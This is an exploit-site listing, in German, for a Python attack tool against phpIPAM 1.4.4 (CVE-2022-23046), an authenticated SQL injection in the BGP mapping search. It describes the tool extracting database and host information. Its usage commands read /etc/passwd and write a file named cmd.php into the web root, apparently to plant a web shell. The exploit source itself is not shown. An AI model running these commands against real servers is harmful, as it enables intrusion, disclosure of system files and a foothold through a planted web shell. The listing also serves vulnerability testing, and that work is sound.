Sploitus

Exploit for phpipam_1.4.4

kitploit · 2026-08-26

Exploit Code

MARKDOWN40 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HADRIAN3689-PHPIPAM_1.4.4
# CVE-2022-23046 phpIPAM 1.4.4 - SQL Injection

phpIPAM v1.4.4 erlaubt es einem authentifizierten Admin-Benutzer, SQL-Befehle in den Subnet-Parameter einzuschleusen, während über app/admin/routing/edit-bgp-mapping-search.php nach einem Subnet gesucht wird. Dieses Projekt gibt derzeit Datenbankinformationen und Host-Versionsinformationen aus. Es kann auch versuchen, Dateien zu lesen und auf dem Server zu schreiben.

## Erste Schritte

### Programm ausführen

  * Um zu prüfen, ob es anfällig ist.



root@kitploit:~
    
    
    python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password
    

  * Zum Testen des Dateilesens



root@kitploit:~
    
    
    python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -f /etc/passwd
    

  * Zum Testen des Dateischreibens



root@kitploit:~
    
    
    python3 phpipam_1.4.4.py -t http://phpipam.com/ -u username -p password -w /var/www/html/cmd.php
    

## Hilfe